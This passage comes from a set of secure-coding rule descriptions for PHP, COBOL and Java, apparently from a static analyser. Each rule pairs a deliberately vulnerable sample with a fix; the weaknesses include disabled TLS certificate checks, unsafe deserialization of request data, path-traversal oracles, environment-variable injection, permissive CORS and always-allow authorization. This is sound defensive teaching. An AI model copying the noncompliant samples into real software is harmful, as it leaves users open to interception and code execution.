  • The developers will have to do a rapid fix every time this happens, instead of having an operations team change a configuration file.
  • It is misleading to use the same address in every environment (dev, sys, qa, prod).

Last but not least, it has an effect on application security. Attackers might be able to decompile the code and thereby discover a potentially sensitive address. They can perform a Denial of Service attack on the service, try to get access to the system, or try to spoof the IP address to bypass security checks. Such attacks are always possible, but in the case of a hardcoded IP address, solving the issue takes more time, which increases an attack’s impact.

Ask Yourself Whether

The disclosed IP address is sensitive, e.g.:

  • It can give an attacker information about the network topology.
  • It’s a personal (assigned to an identifiable person) IP address.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

Don’t hard-code the IP address in the source code; instead, make it configurable with environment variables, configuration files, or a similar approach. Alternatively, if confidentiality is not required, a domain name can be used, since it allows the destination to be changed quickly without rebuilding the software.

Sensitive Code Example

$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
socket_connect($socket, '8.8.8.8', 23);  // Sensitive

Compliant Solution

$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
socket_connect($socket, IP_ADDRESS, 23);  // Compliant
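As a sketch of the configuration-based approach recommended above (SERVICE_HOST is a hypothetical variable name and the fallback domain is illustrative):

```php
<?php
// Hypothetical helper: take the peer address from an environment
// variable instead of hard-coding it, so an operations team can change
// the destination without rebuilding the software.
function resolvePeerAddress(): string
{
    $host = getenv('SERVICE_HOST') ?: 'service.example.com';
    // gethostbyname() returns the input unchanged if resolution fails,
    // so an IP address configured directly is passed through as-is.
    return gethostbyname($host);
}

// Usage (sketch):
// $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
// socket_connect($socket, resolvePeerAddress(), 23);
```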

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Loopback addresses 127.0.0.0/8 in CIDR notation (from 127.0.0.0 to 127.255.255.255)
  • Broadcast address 255.255.255.255
  • Non-routable address 0.0.0.0
  • Strings of the form 2.5.<number>.<number> as they often match Object Identifiers (OID)
  • Addresses in the ranges 192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24, reserved for documentation purposes by RFC 5737
  • Addresses in the range 2001:db8::/32, reserved for documentation purposes by RFC 3849

See

php:S4828

Signaling processes or process groups can seriously affect the stability of this application or other applications on the same system.

Accidentally setting an incorrect PID or signal or allowing untrusted sources to assign arbitrary values to these parameters may result in a denial of service.

Also, the system treats the signal differently if the destination PID is less than or equal to 0. This different behavior may affect multiple processes with the same (E)UID simultaneously if the call is left uncontrolled.

Ask Yourself Whether

  • The parameters pid and sig are untrusted (they come from an external source).
  • This function is triggered by non-administrators.
  • Signal handlers on the target processes stop important functions.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • For stateful applications with user management, ensure that only administrators trigger this code.
  • Verify that the pid and sig parameters are correct before using them.
  • Ensure that the process sending the signals runs with as few OS privileges as possible.
  • Isolate the process on the system based on its (E)UID.
  • Ensure that the signal does not interrupt any essential functions when intercepted by a target’s signal handlers.

Sensitive Code Example

$targetPid = (int)$_GET["pid"];
posix_kill($targetPid, 9); // Sensitive

Compliant Solution

$targetPid = (int)$_GET["pid"];

// Validate the untrusted PID,
// With a pre-approved list or authorization checks
if (isValidPid($targetPid)) {
    posix_kill($targetPid, 9);
}
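The isValidPid() helper above is not defined by the rule; one possible shape, assuming a pre-approved allow-list of PIDs (the signature and the allow-list source are assumptions), is:

```php
<?php
// Hypothetical validation: accept only strictly positive PIDs that
// appear in a pre-approved allow-list. Values <= 0 are rejected because
// the system treats them as process-group targets.
function isValidPid(int $pid, array $allowedPids = []): bool
{
    return $pid > 0 && in_array($pid, $allowedPids, true);
}
```

In a real application the allow-list would come from configuration or an authorization check rather than a hard-coded array.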

See

php:S4829

This rule is deprecated, and will eventually be removed.

Reading Standard Input is security-sensitive. It has led in the past to the following vulnerabilities:

It is common for attackers to craft inputs enabling them to exploit software vulnerabilities. Thus any data read from the standard input (stdin) can be dangerous and should be validated.

This rule flags code that reads from the standard input.

Ask Yourself Whether

  • data read from the standard input is not sanitized before being used.

You are at risk if you answered yes to this question.

Recommended Secure Coding Practices

Sanitize all data read from the standard input before using it.
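As an illustration only (the token format is an assumed policy, not part of the rule), a validation helper could look like:

```php
<?php
// Hypothetical sanitizer: accept a line read from standard input only if
// it matches a strict allow-list pattern; return null otherwise.
function sanitizeToken(string $raw): ?string
{
    $line = rtrim($raw, "\r\n");
    return preg_match('/^[A-Za-z0-9_-]{1,64}$/', $line) === 1 ? $line : null;
}

// Usage (sketch):
// $token = sanitizeToken(fgets(STDIN));
```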

Sensitive Code Example

// Any reference to STDIN is Sensitive
$varstdin = STDIN; // Sensitive
stream_get_line(STDIN, 40); // Sensitive
stream_copy_to_stream(STDIN, STDOUT); // Sensitive
// ...


// Except these references, as they can't create an injection vulnerability.
ftruncate(STDIN, 5); // OK
ftell(STDIN); // OK
feof(STDIN); // OK
fseek(STDIN, 5); // OK
fclose(STDIN); // OK


// STDIN can also be referenced like this
$mystdin = 'php://stdin'; // Sensitive

file_get_contents('php://stdin'); // Sensitive
readfile('php://stdin'); // Sensitive

$input = fopen('php://stdin', 'r'); // Sensitive
fclose($input); // OK

See

php:S4823

This rule is deprecated, and will eventually be removed.

Using command line arguments is security-sensitive. It has led in the past to the following vulnerabilities:

Command line arguments can be dangerous just like any other user input. They should never be used without being first validated and sanitized.

Remember also that any user can retrieve the list of processes running on a system, which makes the arguments provided to them visible. Thus passing sensitive information via command line arguments should be considered insecure.

This rule raises an issue at every program entry point (main method) where command line arguments are used. The goal is to guide security code reviews.

Ask Yourself Whether

  • any of the command line arguments are used without being sanitized first.
  • your application accepts sensitive information via command line arguments.

If you answered yes to any of these questions you are at risk.

Recommended Secure Coding Practices

Sanitize all command line arguments before using them.

Any user or application can list running processes and see the command line arguments they were started with. There are safer ways of providing sensitive information to an application than exposing it in the command line. It is common to write it to the process’s standard input, or to give the path to a file containing the information.
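A sketch of the standard-input alternative mentioned above (the surrounding invocation, e.g. piping the secret into the script, is assumed):

```php
<?php
// Read a secret from a stream (normally STDIN) instead of taking it as a
// command line argument, so it never shows up in the process list.
function readSecretFrom($stream): string
{
    return rtrim((string) fgets($stream), "\r\n");
}

// Usage (sketch):
// $secret = readSecretFrom(STDIN);
```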

Sensitive Code Example

Built-in access to $argv

function globfunc() {
    global $argv; // Sensitive. Reference to global $argv
    foreach ($argv as $arg) { // Sensitive.
        // ...
    }
}

function myfunc($argv) {
    $param = $argv[0]; // OK. Reference to local $argv parameter
    // ...
}

foreach ($argv as $arg) { // Sensitive. Reference to $argv.
    // ...
}

$myargv = $_SERVER['argv']; // Sensitive. Equivalent to $argv.

function serve() {
    $myargv = $_SERVER['argv']; // Sensitive.
    // ...
}

myfunc($argv); // Sensitive

$myvar = $HTTP_SERVER_VARS[0]; // Sensitive. Note: $HTTP_SERVER_VARS has been removed since PHP 5.4.

$options = getopt('a:b:'); // Sensitive. Parsing arguments.

$GLOBALS["argv"]; // Sensitive. Equivalent to $argv.

function myglobals() {
    $GLOBALS["argv"]; // Sensitive
}

$argv = [1,2,3]; // Sensitive. It is a bad idea to override argv.

Zend Console

new Zend\Console\Getopt(['myopt|m' => 'this is an option']); // Sensitive

Getopt-php library

new \GetOpt\Option('m', 'myoption', \GetOpt\GetOpt::REQUIRED_ARGUMENT); // Sensitive

See

php:S4830

This vulnerability makes it possible that an encrypted communication is intercepted.

Why is this an issue?

Transport Layer Security (TLS) provides secure communication between systems over the internet by encrypting the data sent between them. The role of certificate validation in this process is to ensure that a system is indeed the one it claims to be, adding an extra layer of trust and security.

When certificate validation is disabled, the client skips this critical check. This creates an opportunity for attackers to pose as a trusted entity and intercept, manipulate, or steal the data being transmitted.

What is the potential impact?

Establishing trust in a secure way is a non-trivial task. When you disable certificate validation, you are removing a key mechanism designed to build this trust in internet communication, opening your system up to a number of potential threats.

Identity spoofing

If a system does not validate certificates, it cannot confirm the identity of the other party involved in the communication. An attacker can exploit this by creating a fake server and masquerading it as a legitimate one. For example, they might set up a server that looks like your bank’s server, tricking your system into thinking it is communicating with the bank. This scenario, called identity spoofing, allows the attacker to collect any data your system sends to them, potentially leading to significant data breaches.

Loss of data integrity

When TLS certificate validation is disabled, the integrity of the data you send and receive cannot be guaranteed. An attacker could modify the data in transit, and you would have no way of knowing. This could range from subtle manipulations of the data you receive to the injection of malicious code or malware into your system. The consequences of such breaches of data integrity can be severe, depending on the nature of the data and the system.

How to fix it in cURL

Code examples

The following code contains examples of disabled certificate validation.

Certificate validation is disabled by setting CURLOPT_SSL_VERIFYPEER to false. To enable validation, set the value to true, or do not set CURLOPT_SSL_VERIFYPEER at all and rely on the secure default value.

Noncompliant code example

$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, 'https://example.com/');
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); // Noncompliant
curl_exec($curl);
curl_close($curl);

Compliant solution

$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, 'https://example.com/');
curl_exec($curl);
curl_close($curl);

How does this work?

Addressing the vulnerability of disabled TLS certificate validation primarily involves re-enabling the default validation.

To avoid running into problems with invalid certificates, consider the following sections.

Using trusted certificates

If possible, always use a certificate issued by a well-known, trusted CA for your server. Most programming environments come with a predefined list of trusted root CAs, and certificates issued by these authorities are validated automatically. This is the best practice, and it requires no additional code or configuration.

Working with self-signed certificates or non-standard CAs

In some cases, you might need to work with a server using a self-signed certificate, or a certificate issued by a CA not included in your trusted roots. Rather than disabling certificate validation in your code, you can add the necessary certificates to your trust store.
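With cURL, for example, this can be done by pointing CURLOPT_CAINFO at a bundle containing the internal CA certificate, while leaving peer verification enabled ('/etc/ssl/internal-ca.pem' is a hypothetical path):

```php
<?php
// Keep certificate validation enabled and supply the internal CA bundle
// instead of disabling CURLOPT_SSL_VERIFYPEER.
function configureTrustedCurl($curl, string $caBundlePath): void
{
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, true);
    curl_setopt($curl, CURLOPT_CAINFO, $caBundlePath);
}

// Usage (sketch):
// $curl = curl_init();
// curl_setopt($curl, CURLOPT_URL, 'https://internal.example.com/');
// configureTrustedCurl($curl, '/etc/ssl/internal-ca.pem');
// curl_exec($curl);
// curl_close($curl);
```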

Resources

Standards

php:S6339

Why is this an issue?

Secret keys are used in combination with an algorithm to encrypt data. A typical use case is an authentication system. For such a system to be secure, the secret key should have a value which cannot be guessed and which is long enough to not be vulnerable to brute-force attacks.

A "salt" is an extra piece of data which is included when hashing data such as a password. Its value should have the same properties as a secret key.

This rule raises an issue when it detects that a secret key or a salt has a predictable value or that it’s not long enough.

Noncompliant code example

WordPress:

define('AUTH_KEY', 'hello'); // Noncompliant
define('AUTH_SALT', 'hello'); // Noncompliant
define('AUTH_KEY', 'put your unique phrase here'); // Noncompliant, this is the default value

Compliant solution

WordPress:

define('AUTH_KEY', 'D&ovlU#|CvJ##uNq}bel+^MFtT&.b9{UvR]g%ixsXhGlRJ7q!h}XWdEC[BOKXssj');
define('AUTH_SALT', 'FIsAsXJKL5ZlQo)iD-pt??eUbdc{_Cn<4!d~yqz))&B D?AwK%)+)F2aNwI|siOe');
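Rather than copying a published example value, a fresh key can be generated with a cryptographically secure random number generator; a minimal sketch:

```php
<?php
// Generate a 64-character hexadecimal key from 32 bytes of
// cryptographically secure randomness.
function generateAuthKey(): string
{
    return bin2hex(random_bytes(32));
}

// Usage (sketch): generate once, then paste the value into wp-config.php.
// define('AUTH_KEY', generateAuthKey());
```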

Resources

php:S5808

Why is this an issue?

Authorizations granted or denied to users to access resources of an application should be based on strong decisions: for instance, whether the user is authenticated and has the right roles/privileges. They may also depend on the user’s location, or on the date and time at which the user requests access.

Noncompliant code example

In a Symfony web application:

  • the vote method of a VoterInterface type is not compliant when it returns only an affirmative decision (ACCESS_GRANTED):
class NoncompliantVoterInterface implements VoterInterface
{
    public function vote(TokenInterface $token, $subject, array $attributes)
    {
        return self::ACCESS_GRANTED; // Noncompliant
    }
}
  • the voteOnAttribute method of a Voter type is not compliant when it returns only an affirmative decision (true):
class NoncompliantVoter extends Voter
{
    protected function supports(string $attribute, $subject)
    {
        return true;
    }

    protected function voteOnAttribute(string $attribute, $subject, TokenInterface $token)
    {
        return true; // Noncompliant
    }
}

In a Laravel web application:

  • the define, before, and after methods of a Gate are not compliant when they return only an affirmative decision (true or Response::allow()):
class NoncompliantGuard
{
    public function boot()
    {
        Gate::define('xxx', function ($user) {
            return true; // Noncompliant
        });

        Gate::define('xxx', function ($user) {
            return Response::allow(); // Noncompliant
        });
    }
}

Compliant solution

In a Symfony web application:

  • the vote method of a VoterInterface type should return a negative decision (ACCESS_DENIED) or abstain from making a decision (ACCESS_ABSTAIN):
class CompliantVoterInterface implements VoterInterface
{
    public function vote(TokenInterface $token, $subject, array $attributes)
    {
        if (foo()) {
            return self::ACCESS_GRANTED; // Compliant
        } else if (bar()) {
            return self::ACCESS_ABSTAIN;
        }
        return self::ACCESS_DENIED;
    }
}
  • the voteOnAttribute method of a Voter type should return a negative decision (false):
class CompliantVoter extends Voter
{
    protected function supports(string $attribute, $subject)
    {
        return true;
    }

    protected function voteOnAttribute(string $attribute, $subject, TokenInterface $token)
    {
        if (foo()) {
            return true; // Compliant
        }
        return false;
    }
}

In a Laravel web application:

  • the define, before, and after methods of a Gate should return a negative decision (false or Response::deny()) or abstain from making a decision (null):
class CompliantGuard
{
    public function boot()
    {
        Gate::define('xxx', function ($user) {
            if (foo()) {
                return true; // Compliant
            }
            return false;
        });

        Gate::define('xxx', function ($user) {
            if (foo()) {
                return Response::allow(); // Compliant
            }
            return Response::deny();
        });
    }
}

Resources

php:S4834

This rule is deprecated, and will eventually be removed.

The access control of an application must be properly implemented in order to restrict access to resources to authorized entities; otherwise this could lead to vulnerabilities:

Granting correct permissions to users, applications, groups or roles, and defining the required permissions that allow access to a resource, is sensitive and must therefore be done with care. For instance, it is obvious that only users with administrator privileges should be authorized to add/remove the administrator permission of another user.

Ask Yourself Whether

  • Permissions granted to an entity (user, application) allow access to information or functionalities not needed by that entity.
  • Privileges are easily acquired (e.g. based on the location of the user, the type of device used, defined by third parties, or not requiring approval …​).
  • Inherited or default permissions, or entities with no privileges (e.g. an anonymous user), are authorized to access a protected resource.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

At minimum, an access control system should:

  • Use a well-defined access control model like RBAC or ACL.
  • Review entities' permissions regularly to remove permissions that are no longer needed.
  • Respect the principle of least privilege ("an entity has access only to the information and resources that are necessary for its legitimate purpose").

Sensitive Code Example

CakePHP

use Cake\Auth\BaseAuthorize;
use Cake\Controller\Controller;

abstract class MyAuthorize extends BaseAuthorize { // Sensitive. Class extending Cake\Auth\BaseAuthorize.
    // ...
}

// Note that "isAuthorized" methods will only be detected in direct subclasses of Cake\Controller\Controller.
abstract class MyController extends Controller {
    public function isAuthorized($user) { // Sensitive. Method called isAuthorized in a Cake\Controller\Controller.
        return false;
    }
}

See

php:S5122

Having a permissive Cross-Origin Resource Sharing policy is security-sensitive. It has led in the past to the following vulnerabilities:

The same-origin policy in browsers prevents, by default and for security reasons, a JavaScript frontend from performing a cross-origin HTTP request to a resource that has a different origin (domain, protocol, or port) from its own. The requested target can append additional HTTP headers in the response, called CORS headers, that act as directives for the browser and change the access control policy / relax the same-origin policy.

Ask Yourself Whether

  • You don’t trust the origin specified, example: Access-Control-Allow-Origin: untrustedwebsite.com.
  • Access control policy is entirely disabled: Access-Control-Allow-Origin: *
  • Your access control policy is dynamically defined by a user-controlled input like origin header.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • The Access-Control-Allow-Origin header should be set only for a trusted origin and for specific resources.
  • Allow only selected, trusted domains in the Access-Control-Allow-Origin header. Prefer whitelisting domains over blacklisting or allowing any domain (do not use * wildcard nor blindly return the Origin header content without any checks).

Sensitive Code Example

PHP built-in header function:

header("Access-Control-Allow-Origin: *"); // Sensitive

Laravel:

response()->header('Access-Control-Allow-Origin', "*"); // Sensitive

Symfony:

use Symfony\Component\HttpFoundation\Response;

$response = new Response(
    'Content',
    Response::HTTP_OK,
    ['Access-Control-Allow-Origin' => '*'] // Sensitive
);
$response->headers->set('Access-Control-Allow-Origin', '*'); // Sensitive

User-controlled origin:

use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\HttpFoundation\Request;

$origin = $request->headers->get('Origin');

$response->headers->set('Access-Control-Allow-Origin', $origin); // Sensitive

Compliant Solution

PHP built-in header function:

header("Access-Control-Allow-Origin: $trusteddomain");

Laravel:

response()->header('Access-Control-Allow-Origin', $trusteddomain);

Symfony:

use Symfony\Component\HttpFoundation\Response;

$response = new Response(
    'Content',
    Response::HTTP_OK,
    ['Access-Control-Allow-Origin' => $trusteddomain]
);

$response->headers->set('Access-Control-Allow-Origin', $trusteddomain);

User-controlled origin validated with an allow-list:

use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\HttpFoundation\Request;

$origin = $request->headers->get('Origin');

if (in_array($origin, $trustedOrigins)) {
    $response->headers->set('Access-Control-Allow-Origin', $origin);
}

See

php:S2092

When a cookie is protected with the secure attribute set to true, it will not be sent by the browser over an unencrypted HTTP request and thus cannot be observed by an unauthorized person during a man-in-the-middle attack.

Ask Yourself Whether

  • the cookie is, for instance, a session cookie not designed to be sent over non-HTTPS communication.
  • you are not sure whether the website contains mixed content (i.e. whether HTTPS is used everywhere).

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • It is recommended to use HTTPS everywhere, so setting the secure flag to true should be the default behaviour when creating cookies.
  • Set the secure flag to true for session-cookies.

Sensitive Code Example

In php.ini you can specify the flags for the session cookie which is security-sensitive:

session.cookie_secure = 0; // Sensitive: this security-sensitive session cookie is created with the secure flag set to false (cookie_secure = 0)

Same thing in PHP code:

session_set_cookie_params($lifetime, $path, $domain, false);
// Sensitive: this security-sensitive session cookie is created with the secure flag (the fourth argument) set to _false_

If you create a custom security-sensitive cookie in your PHP code:

$value = "sensitive data";
setcookie($name, $value, $expire, $path, $domain, false);  // Sensitive: a security-sensitive cookie is created with the secure flag  (the sixth argument) set to _false_

By default setcookie and setrawcookie functions set the sixth argument / secure flag to false:

$value = "sensitive data";
setcookie($name, $value, $expire, $path, $domain);  // Sensitive: a security-sensitive cookie is created with the secure flag (the sixth argument) not defined (by default to false)
setrawcookie($name, $value, $expire, $path, $domain);  // Sensitive: a security-sensitive cookie is created with the secure flag (the sixth argument) not defined (by default to false)

Compliant Solution

session.cookie_secure = 1; // Compliant: the sensitive cookie will not be sent during an unencrypted HTTP request thanks to the cookie_secure property set to 1
session_set_cookie_params($lifetime, $path, $domain, true); // Compliant: the sensitive cookie will not be sent during an unencrypted HTTP request thanks to the secure flag (the fourth argument) set to true
$value = "sensitive data";
setcookie($name, $value, $expire, $path, $domain, true); // Compliant: the sensitive cookie will not be sent during an unencrypted HTTP request thanks to the secure flag (the sixth argument) set to true
setrawcookie($name, $value, $expire, $path, $domain, true); // Compliant: the sensitive cookie will not be sent during an unencrypted HTTP request thanks to the secure flag (the sixth argument) set to true

See

cobol:S3394

Why is this an issue?

The ACCEPT keyword does no editing or error checking of the data it stores; therefore its use can be dangerous. For this reason, ACCEPT should be avoided.

Noncompliant code example

 01 USER-INPUT PIC X(4).
 01 WS-NUMERIC PIC X VALUE 'N'.

  GET-USER-INPUT.
       MOVE 'N' TO WS-NUMERIC.
       PERFORM UNTIL WS-NUMERIC = 'Y'
           DISPLAY 'ENTER YOUR 4 DIGIT RECORD NUMBER: ' NO ADVANCING
           ACCEPT USER-INPUT *> Noncompliant

Exceptions

This rule ignores uses of ACCEPT FROM with date/time-related inputs.

Resources

javasecurity:S6547

Why is this an issue?

Environment variable injection occurs in an application when the application receives data from a user or a third-party service and, without sanitizing it first, does the following:

  • Creates an environment variable based on the external data.
  • Inserts the external data into certain sensitive environment variables, such as PATH or LD_PRELOAD.

If an application uses environment variables that are vulnerable to injection, it is exposed to a variety of attacks that aim to exploit supposedly safe environment variables, such as PATH.

A user with malicious intent carefully performs actions aimed at modifying or adding environment variables to profit from it.

What is the potential impact?

When user-supplied values are used to manipulate environment variables, an attacker can supply carefully chosen values that cause the system to behave unexpectedly.
In some cases, the attacker can use this capability to execute arbitrary code on the server.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Application-specific attacks

In this scenario, the attacker manages to inject an environment variable that is recognized and used by the remote system. For example, this could be the secret of a particular cloud provider used in an environment variable, or PATH.

Depending on the application, the attacker can read or modify important data or perform unwanted actions.
For example, injecting data into the HTTP_PROXY variable could lead to data leakage.

Application compromise

In the worst case, an attacker manages to inject an important environment variable such as LD_PRELOAD and execute code by overriding trusted code.

Depending on the attacker, code execution can be used with different intentions:

  • Download the internal server’s data, most likely to sell it.
  • Modify data or install malware, for instance, malware that mines cryptocurrencies.
  • Stop services or exhaust resources, for instance, with fork bombs.

This threat is particularly insidious if the attacked organization does not maintain a Disaster Recovery Plan (DRP).

How to fix it in Java SE

Code examples

The following code is vulnerable to environment variable manipulation as it constructs the variables from untrusted data.

Noncompliant code example

protected void doGet(HttpServletRequest request, HttpServletResponse response) throws IOException {
  Runtime r = Runtime.getRuntime();
  String userInput = request.getParameter("example");

  if (userInput != null) {
    String[] envs = {userInput};
    r.exec("/path/to/example", envs);
  } else {
    r.exec("/path/to/example");
  }
}

Compliant solution

protected void doGet(HttpServletRequest request, HttpServletResponse response) throws IOException {
  Runtime r = Runtime.getRuntime();
  String userInput = request.getParameter("example");

  if (userInput != null && userInput.matches("^[a-zA-Z0-9]*$")) {
    String[] envs = {String.format("ENV_VAR=%s", userInput)};
    r.exec("/path/to/example", envs);
  } else {
    r.exec("/path/to/example");
  }
}

How does this work?

User input should be properly sanitized and validated, and ideally used only for the value of the environment variable. The environment variable name should be statically defined.

Validation and sanitization could be done by restricting alphanumeric characters for the value and evaluating the name, if not statically defined, against an allowlist of name values.

Resources

Standards

javasecurity:S6549

Why is this an issue?

Applications behave as filesystem oracles when they disclose to attackers if resources from the filesystem exist or not.

A user with malicious intent would inject specially crafted values, such as ../, to change the initially intended path. The resulting path would resolve to a location somewhere in the filesystem which the user should not normally have access to.

What is the potential impact?

An attacker exploiting a filesystem oracle vulnerability can determine if a file exists or not.

The files that can be affected are limited by the permission of the process that runs the application. Worst case scenario: the process runs with elevated privileges, and therefore any file can be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Information gathering

The vulnerability is exploited to gather information about the host system. The filesystem oracle can help identify user accounts, running services, or the exact version of installed software.

How to fix it in Java SE

Code examples

The following code is vulnerable to a file system oracle as it allows testing the existence of a file anywhere on the file system.

Noncompliant code example

import java.io.File;

@Controller
public class ExampleController
{
    static private String targetDirectory = "/path/to/target/directory/";

    @GetMapping(value = "/exists")
    public void delete(@RequestParam("filename") String filename) throws IOException {

        File file = new File(targetDirectory + filename);
        if (!file.exists()) { // Noncompliant
            throw new IOException("File does not exist in the target directory");
        }
    }
}

Compliant solution

import java.io.File;

@Controller
public class ExampleController
{
    static private String targetDirectory = "/path/to/target/directory/";

    @GetMapping(value = "/exists")
    public void delete(@RequestParam("filename") String filename) throws IOException {

        File file = new File(targetDirectory + filename);
        String canonicalDestinationPath = file.getCanonicalPath();

        if (!canonicalDestinationPath.startsWith(targetDirectory)) {
            throw new IOException("Entry is outside of the target directory");
        } else if (!file.exists()) {
            throw new IOException("File does not exist in the target directory");
        }
    }
}

How does this work?

Canonical path validation

The universal way to avoid filesystem oracle vulnerabilities is to validate paths constructed from untrusted data:

  1. Ensure the target directory path ends with a forward slash to prevent partial path traversal (see the "Pitfalls" section).
  2. Resolve the canonical path of the file by using methods like java.io.File.getCanonicalPath. This will resolve relative paths or path components like ../ and remove any ambiguity regarding the file’s location.
  3. Check that the canonical path is within the directory where the file should be located.

Important Note: The order of this process pattern is important. The code must follow this order exactly to be secure by design:

  1. data = transform(user_input);
  2. data = normalize(data);
  3. data = sanitize(data);
  4. use(data);

As pointed out in this SonarSource talk, failure to follow this exact order leads to security vulnerabilities.
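The transform, normalize, sanitize, use order can be sketched as a single helper. This is a minimal sketch under Linux path assumptions; the class and method names (SafePathCheck, resolveInside) are hypothetical, and baseDir is expected to end with a path separator:

```java
import java.io.File;
import java.io.IOException;

// Hypothetical sketch of the transform -> normalize -> sanitize -> use
// order applied to an untrusted filename.
public class SafePathCheck {
    public static File resolveInside(String baseDir, String userInput) throws IOException {
        // 1. transform: build the candidate path from user input
        File candidate = new File(baseDir + userInput);
        // 2. normalize: resolve ../ components into a canonical path
        String canonical = candidate.getCanonicalPath();
        // 3. sanitize: reject anything outside the base directory
        //    (baseDir must end with a path separator, see "Pitfalls")
        if (!canonical.startsWith(baseDir)) {
            throw new IOException("Entry is outside of the target directory");
        }
        // 4. use: the caller may now operate on the validated file
        return new File(canonical);
    }
}
```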

Pitfalls

Partial Path Traversal

When validating untrusted paths by checking if they start with a trusted folder name, ensure the validation string contains a path separator as the last character.
A partial path traversal vulnerability can be unintentionally introduced into the application without a path separator as the last character of the validation strings.

For example, the following code is vulnerable to partial path injection. Note that the string targetDirectory does not end with a path separator:

static private String targetDirectory = "/Users/John";

@GetMapping(value = "/endpoint")
public void endpoint(@RequestParam("folder") String fileName) throws IOException {

    String canonicalizedFileName = new File(fileName).getCanonicalPath();

    if (!canonicalizedFileName.startsWith(targetDirectory)) {
        throw new IOException("Entry is outside of the target directory");
    }
}

This check can be bypassed if other directory names start with John. For instance, "/Users/Johnny".startsWith("/Users/John") returns true. Thus, for validation, "/Users/John" should actually be "/Users/John/".

Warning: Some functions, such as getCanonicalPath, remove the terminating path separator in their return value.
The validation code should be tested to ensure that it cannot be impacted by this issue.
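The behavior can be checked directly (Linux paths assumed; the class and method names are hypothetical). A defensive fix is to re-append the separator to the canonical prefix before calling startsWith:

```java
import java.io.File;

// getCanonicalPath drops the trailing separator, so the validation
// prefix must re-append it before being used with startsWith.
public class TrailingSeparatorDemo {
    public static String canonicalPrefix(String dir) throws Exception {
        String canonical = new File(dir).getCanonicalPath();
        // Re-append the separator so "/Users/Johnny" can no longer match
        return canonical.endsWith(File.separator) ? canonical : canonical + File.separator;
    }
}
```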

Here is a real-life example of this vulnerability.

Do not use java.nio.file.Path.resolve as a validator

As specified in the official documentation, if the given parameter is an absolute path, the base object from which the method is called is discarded and is not included in the resulting string.

This means that including untrusted data in the parameter and using the resulting string for file operations may lead to a path traversal vulnerability.
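The pitfall can be demonstrated in a few lines (the wrapper class name is illustrative; the behavior is that of java.nio.file.Path.resolve itself):

```java
import java.nio.file.Paths;

// When the argument to resolve() is an absolute path, the base path
// is discarded entirely, so resolve() must not be used for validation.
public class ResolvePitfall {
    public static String resolveAgainstBase(String base, String untrusted) {
        return Paths.get(base).resolve(untrusted).toString();
    }
}
```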

Resources

Standards

javasecurity:S5135

Why is this an issue?

Deserialization injections occur when applications deserialize wholly or partially untrusted data without verification.

What is the potential impact?

In the context of a web application performing unsafe deserialization:
After detecting the injection vector, attackers inject a carefully-crafted payload into the application.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Application-specific attacks

In this scenario, the attackers succeed in injecting an object of the expected class, but with malicious properties that affect the object’s behavior.

If the application relies on the properties of the deserialized object, attackers can modify the data structure or content to escalate privileges or perform unwanted actions.
In the context of an e-commerce application, this could be changing the number of products or prices.

Full application compromise

In the worst-case scenario, the attackers succeed in injecting an object of a completely different class than expected, triggering code execution.

Depending on the attacker, code execution can be used with different intentions:

  • Download the internal server’s data, most likely to sell it.
  • Modify data, install malware, for instance, malware that mines cryptocurrencies.
  • Stop services or exhaust resources, for instance, with fork bombs.

This threat is particularly insidious if the attacked organization does not maintain a Disaster Recovery Plan (DRP).

Root privilege escalation and pivot

In this scenario, the attacker can do everything described in the previous section. The difference is that the attacker additionally manages to elevate their privileges to an administrative level and attack other servers.

Here, the impact depends on how much the target company focuses on its Defense In Depth. For example, the entire infrastructure can be compromised through a combination of unsafe deserialization and misconfiguration:

  • Docker or Kubernetes clusters
  • cloud services
  • network firewalls and routing
  • OS access control

How to fix it in Java SE

Code examples

The following code is vulnerable to deserialization attacks because it deserializes HTTP data without validating it first.

Noncompliant code example

public class RequestProcessor {
  protected void doGet(HttpServletRequest request, HttpServletResponse response) throws IOException, ClassNotFoundException {
    ServletInputStream servletIS = request.getInputStream();
    ObjectInputStream  objectIS  = new ObjectInputStream(servletIS);
    Object input                 = objectIS.readObject();
  }
}

Compliant solution

public class SecureObjectInputStream extends ObjectInputStream {

  @Override
  protected Class<?> resolveClass(ObjectStreamClass osc) throws IOException, ClassNotFoundException {

    List<String> approvedClasses = new ArrayList<String>();
    approvedClasses.add(AllowedClass1.class.getName());
    approvedClasses.add(AllowedClass2.class.getName());

    if (!approvedClasses.contains(osc.getName())) {
      throw new InvalidClassException("Unauthorized deserialization", osc.getName());
    }

    return super.resolveClass(osc);
  }
}

public class RequestProcessor {
  protected void doGet(HttpServletRequest request, HttpServletResponse response) throws IOException, ClassNotFoundException {
    ServletInputStream servletIS = request.getInputStream();
    ObjectInputStream  objectIS  = new SecureObjectInputStream(servletIS);
    Object input                 = objectIS.readObject();
  }
}

How does this work?

Allowing users to provide data for deserialization generally creates more problems than it solves.

Anything that can be done through deserialization can generally be done with more secure data structures.
Therefore, our first suggestion is to avoid deserialization in the first place.

However, if deserialization mechanisms are valid in your context, here are some security suggestions.

More secure serialization methods

Some more secure serialization methods reduce the risk of security breaches, although not definitively.

A complete object serializer is probably unnecessary if you only need to receive primitive data (for example, integers, strings, or booleans).
In this case, formats such as JSON and XML protect the application from deserialization attacks by default.

For more complex objects, the next step is to control which class fields are exposed by creating class-specific serialization methods.
The most common method is to use Data Transfer Objects (DTO) patterns or Google Protocol Buffers (protobufs). After creating the Protobuf data structure, the Protobuf compiler creates class files that handle operations such as serializing and deserializing data.

Integrity check

